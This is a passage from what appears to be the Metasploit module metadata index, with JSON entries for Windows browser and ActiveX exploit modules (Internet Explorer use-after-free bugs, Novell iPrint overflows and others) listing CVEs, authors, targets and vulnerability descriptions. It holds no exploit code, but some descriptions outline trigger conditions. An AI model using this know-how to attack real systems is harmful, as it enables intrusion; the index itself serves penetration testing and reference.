Gonzalez and reported to iDefense, but was discovered again\n by Orange Tsai at Hitcon 2013.", + "references": [ + "CVE-2013-3163", + "OSVDB-94981", + "MSB-MS13-055", + "URL-https://speakerd.s3.amazonaws.com/presentations/0df98910d26c0130e8927e81ab71b214/for-share.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_055_canchor.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_055_canchor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_059_cflatmarkuppointer": { + "name": "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free", + "fullname": "exploit/windows/browser/ms13_059_cflatmarkuppointer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-27", + "type": "exploit", + "author": [ + "corelanc0d3r", + "sinn3r " + ], + "description": "This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,\n it seems to only affect certain releases of mshtml.dll, ranging from a newly\n installed IE9 (9.0.8112.16446), to 9.00.8112.16502 (July 2013 update). IE8\n requires a different way to trigger the vulnerability, but not currently covered\n by this module.\n\n The issue is specific to the browser's IE7 document compatibility, which can be\n defined in X-UA-Compatible, and the content editable mode must be enabled. An\n \"onmove\" event handler is also necessary to be able to trigger the bug, and the\n event will be run twice before the crash. The first time is due to the position\n change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'\n object is created during a \"SelectAll\" command, and this object will be used later\n on for the crash. The second onmove event seems to be triggered by a InsertButton\n (or Insert-whatever) command, which is also responsible for the free of object\n CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will\n then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and\n then passes this on to the next functions (GetLineInfo -> QIClassID). When this\n reference arrives in function QIClassID, an access violation finally occurs when\n the function is trying to call QueryInterface() with the bad reference, and this\n results a crash. Successful control of the freed memory may leverage arbitrary code\n execution under the context of the user.\n\n Note: It is also possible to see a different object being freed and used, doesn't\n always have to be CFlatMarkupPointer.", + "references": [ + "CVE-2013-3184", + "OSVDB-96182", + "MSB-MS13-059", + "BID-61668", + "ZDI-13-194", + "ZDI-13-195" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_059_cflatmarkuppointer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_069_caret": { + "name": "MS13-069 Microsoft Internet Explorer CCaret Use-After-Free", + "fullname": "exploit/windows/browser/ms13_069_caret", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-09-10", + "type": "exploit", + "author": [ + "corelanc0d3r", + "sinn3r " + ], + "description": "This module exploits a use-after-free vulnerability found in Internet Explorer,\n specifically in how the browser handles the caret (text cursor) object. In IE's standards\n mode, the caret handling's vulnerable state can be triggered by first setting up an\n editable page with an input field, and then we can force the caret to update in an\n onbeforeeditfocus event by setting the body's innerHTML property. In this event handler,\n mshtml!CCaret::`vftable' can be freed using a document.write() function, however,\n mshtml!CCaret::UpdateScreenCaret remains unaware of this change, and still uses the\n same reference to the CCaret object. When the function tries to use this invalid reference\n to call a virtual function at offset 0x2c, it finally results a crash. Precise control of\n the freed object allows arbitrary code execution under the context of the user.", + "references": [ + "CVE-2013-3205", + "OSVDB-97094", + "MSB-MS13-069", + "ZDI-13-217" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 on Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_069_caret.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_069_caret", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_080_cdisplaypointer": { + "name": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", + "fullname": "exploit/windows/browser/ms13_080_cdisplaypointer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-08", + "type": "exploit", + "author": [ + "Unknown", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.", + "references": [ + "CVE-2013-3897", + "OSVDB-98207", + "MSB-MS13-080", + "URL-http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx", + "URL-http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 8 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_080_cdisplaypointer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms13_090_cardspacesigninhelper": { + "name": "MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow", + "fullname": "exploit/windows/browser/ms13_090_cardspacesigninhelper", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-11-08", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a vulnerability on the CardSpaceClaimCollection class from the\n icardie.dll ActiveX control. The vulnerability exists while the handling of the\n CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of\n elements on a SafeArray and keeps a size field, counting the number of elements on the\n collection. By calling the remove() method on an empty CardSpaceClaimCollection it is\n possible to underflow the length field, storing a negative integer. Later, a call to\n the add() method will use the corrupted length field to compute the address where write\n into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents.\n This module achieves code execution by using VBScript as discovered in the wild on\n November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create\n a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt\n one of the legit OBJECT elements with the described integer overflow and (5) achieve code\n execution by forcing the use of the corrupted OBJECT.", + "references": [ + "CVE-2013-3918", + "OSVDB-99555", + "BID-63631", + "MSB-MS13-090", + "URL-http://blogs.technet.com/b/msrc/archive/2013/11/11/activex-control-issue-being-addressed-in-update-tuesday.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP with IE 8" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms13_090_cardspacesigninhelper", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms14_012_cmarkup_uaf": { + "name": "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", + "fullname": "exploit/windows/browser/ms14_012_cmarkup_uaf", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-02-13", + "type": "exploit", + "author": [ + "Unknown", + "Jean-Jamil Khalife", + "juan vazquez " + ], + "description": "This module exploits an use after free condition on Internet Explorer as used in the wild\n as part of \"Operation SnowMan\" in February 2014. The module uses Flash Player 12 in order to\n bypass ASLR and DEP.", + "references": [ + "CVE-2014-0322", + "MSB-MS14-012", + "BID-65551", + "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html", + "URL-http://hdwsec.fr/blog/CVE-2014-0322.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1 / IE 10 / FP 12" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms14_012_cmarkup_uaf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms14_012_textrange": { + "name": "MS14-012 Microsoft Internet Explorer TextRange Use-After-Free", + "fullname": "exploit/windows/browser/ms14_012_textrange", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-03-11", + "type": "exploit", + "author": [ + "Jason Kratzer", + "sinn3r " + ], + "description": "This module exploits a use-after-free vulnerability found in Internet Explorer. The flaw\n was most likely introduced in 2013, therefore only certain builds of MSHTML are\n affected. In our testing with IE9, these vulnerable builds appear to be between\n 9.0.8112.16496 and 9.0.8112.16533, which implies the vulnerability shipped between\n August 2013, when it was introduced, until the fix issued in early March 2014.", + "references": [ + "CVE-2014-0307", + "MSB-MS14-012" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms14_012_textrange.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms14_012_textrange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms14_064_ole_code_execution": { + "name": "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution", + "fullname": "exploit/windows/browser/ms14_064_ole_code_execution", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-11-13", + "type": "exploit", + "author": [ + "Robert Freeman", + "yuange", + "Rik van Duijn", + "Wesley Neelen", + "GradiusX ", + "b33f", + "sinn3r " + ], + "description": "This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.\n The vulnerability is known to affect Internet Explorer 3.0 until version 11 within\n Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will\n only target Windows XP and Windows 7 box due to the Powershell limitation.\n\n Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other\n newer Windows systems, the exploit will try using Powershell instead.", + "references": [ + "CVE-2014-6332", + "MSB-MS14-064", + "OSVDB-114533", + "EDB-35229", + "EDB-35308", + "URL-http://securityintelligence.com/ibm-x-force-researcher-finds-significant-vulnerability-in-microsoft-windows", + "URL-https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP", + "Windows 7" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms14_064_ole_code_execution", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/ms16_051_vbscript": { + "name": "Internet Explorer 11 VBScript Engine Memory Corruption", + "fullname": "exploit/windows/browser/ms16_051_vbscript", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-05-10", + "type": "exploit", + "author": [ + "Theori", + "William Webb " + ], + "description": "This module exploits the memory corruption vulnerability (CVE-2016-0189)\n present in the VBScript engine of Internet Explorer 11.", + "references": [ + "CVE-2016-0189", + "MSB-MS16-051" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 10 with IE 11" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/ms16_051_vbscript.rb", + "is_install_path": true, + "ref_name": "windows/browser/ms16_051_vbscript", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/msvidctl_mpeg2": { + "name": "Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption", + "fullname": "exploit/windows/browser/msvidctl_mpeg2", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-07-05", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a memory corruption within the MSVidCtl component of Microsoft\n DirectShow (BDATuner.MPEG2TuneRequest).\n By loading a specially crafted GIF file, an attacker can overrun a buffer and\n execute arbitrary code.\n\n ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid", + "references": [ + "CVE-2008-0015", + "OSVDB-55651", + "BID-35558", + "MSB-MS09-032", + "MSB-MS09-037" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/msvidctl_mpeg2.rb", + "is_install_path": true, + "ref_name": "windows/browser/msvidctl_mpeg2", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mswhale_checkforupdates": { + "name": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/mswhale_checkforupdates", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-04-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2007-2238", + "OSVDB-53933", + "URL-http://technet.microsoft.com/en-us/library/dd282918.aspx" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mswhale_checkforupdates.rb", + "is_install_path": true, + "ref_name": "windows/browser/mswhale_checkforupdates", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/msxml_get_definition_code_exec": { + "name": "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", + "fullname": "exploit/windows/browser/msxml_get_definition_code_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2012-06-12", + "type": "exploit", + "author": [ + "inking26", + "binjo", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a memory corruption flaw in Microsoft XML Core Services\n when trying to access an uninitialized Node with the getDefinition API, which\n may corrupt memory allowing remote code execution.", + "references": [ + "CVE-2012-1889", + "BID-53934", + "OSVDB-82873", + "MSB-MS12-043", + "URL-http://technet.microsoft.com/en-us/security/advisory/2719615", + "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462", + "URL-https://www.rapid7.com/blog/post/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3 / Vista SP2", + "IE 8 on Windows XP SP3", + "IE 8 with Java 6 on Windows XP SP3", + "IE 8 with Java 6 on Windows 7 SP1/Vista SP2", + "IE 9 with Java 6 on Windows 7 SP1" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/msxml_get_definition_code_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/nctaudiofile2_setformatlikesample": { + "name": "NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow", + "fullname": "exploit/windows/browser/nctaudiofile2_setformatlikesample", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-01-24", + "type": "exploit", + "author": [ + "MC ", + "dookie", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n Control provided by various audio applications. By sending an overly long\n string to the \"SetFormatLikeSample()\" method, an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2007-0018", + "OSVDB-32032", + "BID-22196", + "US-CERT-VU-292713" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP2/SP3 Pro English (IE6)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb", + "is_install_path": true, + "ref_name": "windows/browser/nctaudiofile2_setformatlikesample", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/nis2004_antispam": { + "name": "Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/nis2004_antispam", + "aliases": [], + "rank": 300, + "disclosure_date": "2004-03-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Norton AntiSpam 2004. When\n sending an overly long string to the LaunchCustomRuleWizard() method\n of symspam.dll (2004.1.0.147) an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2004-0363", + "OSVDB-6249", + "BID-9916" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/nis2004_antispam.rb", + "is_install_path": true, + "ref_name": "windows/browser/nis2004_antispam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/nis2004_get": { + "name": "Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/nis2004_get", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-05-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the ISAlertDataCOM ActiveX\n Control (ISLAert.dll) provided by Symantec Norton Internet Security 2004.\n By sending an overly long string to the \"Get()\" method, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2007-1689", + "OSVDB-36164", + "URL-http://securityresponse.symantec.com/avcenter/security/Content/2007.05.16.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1 Pro English", + "Windows 2000 Pro English All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/nis2004_get.rb", + "is_install_path": true, + "ref_name": "windows/browser/nis2004_get", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/notes_handler_cmdinject": { + "name": "IBM Lotus Notes Client URL Handler Command Injection", + "fullname": "exploit/windows/browser/notes_handler_cmdinject", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-18", + "type": "exploit", + "author": [ + "Moritz Jodeit", + "Sean de Regge", + "juan vazquez " + ], + "description": "This module exploits a command injection vulnerability in the URL handler for\n for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with\n a specially crafted notes:// URL to execute arbitrary commands with also arbitrary\n arguments. This module has been tested successfully on Windows XP SP3 with IE8,\n Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.", + "references": [ + "CVE-2012-2174", + "OSVDB-83063", + "BID-54070", + "ZDI-12-154", + "URL-http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html", + "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21598348" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-10-06 13:43:31 +0000", + "path": "/modules/exploits/windows/browser/notes_handler_cmdinject.rb", + "is_install_path": true, + "ref_name": "windows/browser/notes_handler_cmdinject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/novell_groupwise_gwcls1_actvx": { + "name": "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", + "fullname": "exploit/windows/browser/novell_groupwise_gwcls1_actvx", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-30", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll\n ActiveX. Several methods in the GWCalServer control use user provided data as\n a pointer, which allows to read arbitrary memory and execute arbitrary code. This\n module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The\n JRE6 needs to be installed to achieve ASLR bypass.", + "references": [ + "CVE-2012-0439", + "OSVDB-89700", + "BID-57658", + "ZDI-13-008", + "URL-http://www.novell.com/support/kb/doc.php?id=7011688" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "IE 6 on Windows XP SP3", + "IE 7 on Windows XP SP3", + "IE 8 on Windows XP SP3", + "IE 7 on Windows Vista", + "IE 8 on Windows Vista", + "IE 8 on Windows 7", + "IE 9 on Windows 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb", + "is_install_path": true, + "ref_name": "windows/browser/novell_groupwise_gwcls1_actvx", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_callbackurl": { + "name": "Novell iPrint Client ActiveX Control call-back-url Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_callbackurl", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-20", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.42.\n When sending an overly long string to the 'call-back-url' parameter in an\n op-client-interface-version action of ienipp.ocx an attacker may be able to\n execute arbitrary code.", + "references": [ + "CVE-2010-1527", + "OSVDB-67411", + "URL-http://web.archive.org/web/20100824204359/http://secunia.com:80/secunia_research/2010-104", + "EDB-15042" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_callbackurl.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_callbackurl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_datetime": { + "name": "Novell iPrint Client ActiveX Control Date/Time Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_datetime", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-08", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.30. When\n passing a specially crafted date/time string via certain parameters to ienipp.ocx\n an attacker can execute arbitrary code.\n\n NOTE: The \"operation\" variable must be set to a valid command in order to reach this\n vulnerability.", + "references": [ + "CVE-2009-1569", + "BID-37242", + "OSVDB-60804", + "URL-http://web.archive.org/web/20091213033620/http://secunia.com:80/advisories/35004" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "iPrint 5.30 Windows Client" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_datetime.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_datetime", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_executerequest": { + "name": "Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_executerequest", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-02-22", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n sending an overly long string to the ExecuteRequest() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-0935", + "OSVDB-42063", + "BID-27939" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_executerequest.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_executerequest", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_executerequest_dbg": { + "name": "Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_executerequest_dbg", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-04", + "type": "exploit", + "author": [ + "Trancer " + ], + "description": "This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.\n When sending an overly long string to the 'debug' parameter in ExecuteRequest()\n property of ienipp.ocx an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-3106", + "OSVDB-66960", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-10-06", + "EDB-15001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_executerequest_dbg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_getdriversettings": { + "name": "Novell iPrint Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_getdriversettings", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-06-16", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 4.34. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-2908", + "OSVDB-46194", + "URL-http://web.archive.org/web/20081206030916/http://secunia.com:80/advisories/30709/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/novelliprint_getdriversettings.rb", + "is_install_path": true, + "ref_name": "windows/browser/novelliprint_getdriversettings", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/novelliprint_getdriversettings_2": { + "name": "Novell iPrint Client ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/novelliprint_getdriversettings_2", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-11-15", + "type": "exploit", + "author": [ + "mr_me ", + "Dr_IDE" + ], + "description": "This module exploits a stack buffer overflow in Novell iPrint Client 5.52. When\n sending an overly long string to the GetDriverSettings() property of ienipp.ocx\n an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2010-4321", + "BID-44966", + "OSVDB-69357", + "ZDI-10-256", + "EDB-16014", + "URL-http://www.novell.com/support/viewContent.do?externalId=7007234" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 